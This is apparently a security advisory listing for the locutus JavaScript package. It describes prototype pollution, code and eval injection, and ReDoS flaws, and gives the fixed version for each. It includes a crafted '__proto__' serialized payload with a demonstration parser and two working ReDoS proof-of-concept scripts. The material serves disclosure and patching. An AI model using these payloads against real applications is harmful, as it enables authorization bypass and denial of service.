Prototype Pollution
locutus is a Locutus other languages' standard libraries to JavaScript for fun and educational purposes
Affected versions of this package are vulnerable to Prototype Pollution in the unserialize function. An attacker who supplies a specially crafted serialized payload containing the __proto__ key can inject arbitrary properties into the prototype of deserialized objects, potentially bypassing authorization checks or causing denial of service by overriding built-in methods.
How to fix Prototype Pollution? Upgrade locutus to version 3.0.25 or higher.
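To show the mechanism behind this advisory, here is an added example that is not locutus code: a minimal parser for the PHP serialize() format that unserialize consumes, assumed to handle only the s:/i:/b:/a: types, with the naive key assignment beside the hardened form.

```javascript
// Added example, not locutus code: a minimal parser for the PHP
// serialize() subset s:/i:/b:/a: (the format unserialize consumes).
// With hardened=false it assigns keys naively, so the value under a
// "__proto__" key in the payload becomes the prototype of the
// deserialized object; with hardened=true it builds null-prototype
// objects and drops the "__proto__" key, so nothing can be inherited.
function phpUnserialize(input, hardened) {
  let pos = 0;
  function readValue() {
    const type = input[pos];
    if (type === 'i' || type === 'b') {          // i:42;  b:1;
      const end = input.indexOf(';', pos);
      const raw = input.slice(pos + 2, end);
      pos = end + 1;
      return type === 'i' ? parseInt(raw, 10) : raw === '1';
    }
    if (type === 's') {                          // s:5:"admin";
      const colon = input.indexOf(':', pos + 2);
      const len = parseInt(input.slice(pos + 2, colon), 10);
      const str = input.slice(colon + 2, colon + 2 + len);
      pos = colon + 2 + len + 2;                 // skip closing quote and ';'
      return str;
    }
    if (type === 'a') {                          // a:<count>:{key value ...}
      const colon = input.indexOf(':', pos + 2);
      const count = parseInt(input.slice(pos + 2, colon), 10);
      pos = colon + 2;                           // skip ':{'
      const out = hardened ? Object.create(null) : {};
      for (let i = 0; i < count; i++) {
        const key = readValue();
        const value = readValue();
        // Hardened: a payload-controlled key must never reach the
        // __proto__ setter. A null-prototype object has no such setter,
        // and the key is dropped as well so later merges stay clean.
        if (hardened && key === '__proto__') continue;
        out[key] = value;
      }
      pos += 1;                                  // skip '}'
      return out;
    }
    throw new Error('unsupported type at offset ' + pos);
  }
  return readValue();
}

// Constructed payload of the kind described above: an array whose only
// key is "__proto__", carrying {admin: true}.
const PAYLOAD = 'a:1:{s:9:"__proto__";a:1:{s:5:"admin";b:1;}}';
const polluted = phpUnserialize(PAYLOAD, false);   // polluted.admin === true (inherited, not own)
const clean = phpUnserialize(PAYLOAD, true);       // clean.admin === undefined
```

The naive result passes an `if (user.admin)` check even though `Object.keys(polluted)` is empty, which is exactly why a key named __proto__ must be rejected before assignment.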
Arbitrary Code Injection
Affected versions of this package are vulnerable to Arbitrary Code Injection via the create_function(args, code) function. An attacker can execute arbitrary code by supplying unsanitized input to the arguments, which are passed directly to the Function constructor.
How to fix Arbitrary Code Injection? Upgrade locutus to version 3.0.14 or higher.
Eval Injection
Affected versions of this package are vulnerable to Eval Injection in the call_user_func_array() function, which executes eval() on user-supplied input, and does not sanitize the second argument in the input array (the method name). An attacker can execute arbitrary JavaScript code with the privileges of the Node.js runtime if the target application is being used as a gateway or router using Locutus functions.
How to fix Eval Injection? Upgrade locutus to version 3.0.0 or higher.
Prototype Pollution
Affected versions of this package are vulnerable to Prototype Pollution via the locutus.php.strings.parse_str function. An attacker can modify the prototype of global objects by supplying crafted input, leading to authentication bypass, denial of service, or execution of arbitrary code if polluted properties are passed to sensitive sinks.
How to fix Prototype Pollution? Upgrade locutus to version 2.0.39 or higher.
Regular Expression Denial of Service (ReDoS)
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the gopher_parsedir function.
PoC by Yeting Li
var gopher_parsedir = require("locutus/php/net-gopher/gopher_parsedir")

// Build a string of n tab characters followed by "!", which the
// vulnerable regular expression takes a long time to process.
function build_attack(n) {
  var ret = ""
  for (var i = 0; i < n; i++) {
    ret += "\t"
  }
  return ret + "!";
}

var attack_str = build_attack(5000)
// A well-formed gopher directory entry, for comparison:
// var entry = gopher_parsedir('0All about my gopher site.\t/allabout.txt\tgopher.example.com\t70\u000d\u000a')
var entry = gopher_parsedir(attack_str)
How to fix Regular Expression Denial of Service (ReDoS)? Upgrade locutus to version 2.0.15 or higher.
Regular Expression Denial of Service (ReDoS)
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The regular expression at src/php/network/inet_pton.js:24 is vulnerable to ReDoS: passing a string made of some number of repeated characters followed by a '.' causes increasing slow-downs that lock the event loop.
PoC by Robert McLaughlin
const inet_pton = require('locutus/php/network/inet_pton');

console.log('starting')
// Each iteration feeds i repeated 'a' characters followed by '.';
// the elapsed time grows with i while the event loop is blocked.
for (let i = 4; i < 40; i++) {
  const str = new Array(i).fill('a').join('') + '.';
  const start = +new Date();
  inet_pton(str);
  const elapsed = (+new Date()) - start;
  console.log('i=' + i + ' elapsed (seconds): ' + elapsed / 1000);
}
How to fix Regular Expression Denial of Service (ReDoS)? Upgrade locutus to version 2.0.15 or higher.